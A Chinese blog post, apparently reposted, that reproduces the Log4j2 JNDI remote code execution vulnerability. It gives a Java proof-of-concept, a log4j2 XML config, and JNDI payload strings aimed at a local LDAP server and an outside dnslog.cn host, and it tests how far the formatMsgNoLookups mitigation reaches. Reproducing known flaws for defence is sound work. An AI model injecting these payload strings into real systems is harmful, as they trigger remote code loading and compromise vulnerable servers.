1. 首页
  2. 文章中心
  3. cve漏洞复现

Log4j2 RCE漏洞复现

93 阅读 0 评论
我是靠谱客的博主 幸福跳跳糖,这篇文章主要介绍Log4j2 RCE漏洞复现,现在分享给大家,希望可以做个参考。

复现一下这个让安全圈过年的漏洞Log4j2-rce

漏洞影响范围

2.0 <= Apache Log4j <= 2.15.0-rc1(1.x版本暂时未发现存在该问题)

漏洞复现

环境要求 JDK版本不高于11.0.1 8u191 7u201 6u211,复现环境使用8u181

完整代码

主要是用log4j跑一下payload,怎么搭JNDI的利用环境可以到我之前fastjson漏洞分析的文章中找下

复制代码
1
2
3
4
5
6
7
8
9
10
11
public class LogRCE {
    private static final Logger logger = LogManager.getLogger(LogRCE.class);

    public static void main(String[] args) {
//      DNSLOG:${jndi:ldap://pn48a0.dnslog.cn/Exp}
//      POC:${jndi:ldap://127.0.0.1:1389/ExecTest}
        logger.info("sdfdsf${jndi:ldap://127.0.0.1:1389/ExecTest}");
//      jvm启动参数:-Dlog4j2.formatMsgNoLookups=true
    }
}

配置文件,将日志级别设成info,方便对所有日志等级进行测试

复制代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
<?xml version="1.0" encoding="UTF-8"?>
<Configuration>
    <Properties>
        <Property name="log.pattern">%d{YYYY-MM-DD HH:mm:ss.SSS} %-5level %class{36} %L %M - %msg%xEx%n</Property>
        <Property name="file.all.filename">log/all.log</Property>
        <Property name="file.all.pattern">log/all.%i.log.gz</Property>
        <Property name="file.err.filename">log/err.log</Property>
        <Property name="file.err.pattern">log/err.%i.log.gz</Property>
    </Properties>
    <Appenders>
        <Console name="console" target="SYSTEM_OUT">
            <PatternLayout pattern="${log.pattern}" />
        </Console>

        <RollingFile name="all" bufferedIO="true" fileName="${file.all.filename}" filePattern="${file.all.pattern}">
            <PatternLayout pattern="${log.pattern}"/>
            <Policies>
                <SizeBasedTriggeringPolicy size="1 MB"/>
            </Policies>
            <DefaultRolloverStrategy max="10"/>
        </RollingFile>

        <RollingFile name="err" bufferedIO="true" fileName="${file.err.filename}" filePattern="${file.err.pattern}">
            <PatternLayout pattern="${log.pattern}"/>
            <Policies>
                <SizeBasedTriggeringPolicy size="1 MB"/>
            </Policies>
            <DefaultRolloverStrategy max="10"/>
        </RollingFile>
    </Appenders>
    <Loggers>
        <Root level="info">
            <AppenderRef ref="console" level="info"/>
            <AppenderRef ref="console" level="error"/>
        </Root>
    </Loggers>
</Configuration>

直接运行就可以触发
image-20211210225632640

使用JVM参数的应急措施不是所有版本有效

在众多厂商发布的通告中都提供了通过增加-Dlog4j2.formatMsgNoLookups=trueJVM启动参数的方式作为应急措施,但是经过测试只对2.11及以上版本有效(2.10 jar包下载失败没有测)

2.8版本添加参数没有效果
image-20211210231938853

最后

以上就是幸福跳跳糖最近收集整理的关于Log4j2 RCE漏洞复现的全部内容,更多相关Log4j2内容请搜索靠谱客的其他文章。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(62)

相关文章

Log4j2手把手的漏洞复现——简易版漏洞简介简易的漏洞复现
Log4j2手把手的漏洞复现——简易版漏洞简介简易的漏洞复现
log4j2 漏洞的简单利用
log4j2 漏洞的简单利用
Log4j2高危漏洞CNVD-2021-95914分析复现修复漏洞描述复现代码测试用例修复建议
Log4j2高危漏洞CNVD-2021-95914分析复现修复漏洞描述复现代码测试用例修复建议
Java日志框架学习笔记
Java日志框架学习笔记
Log4j2 RCE漏洞复现
Log4j2 RCE漏洞复现
log4j2和jdk版本不兼容问题
log4j2和jdk版本不兼容问题
log4j的基本使用步骤(入门级)
log4j的基本使用步骤(入门级)
log4j2 2.17.1又来了,这节奏简直吊打去年的fastjson?让它再飞一会儿解决措施
log4j2 2.17.1又来了,这节奏简直吊打去年的fastjson?让它再飞一会儿解决措施

评论列表共有 0 条评论

立即
投稿
返回
顶部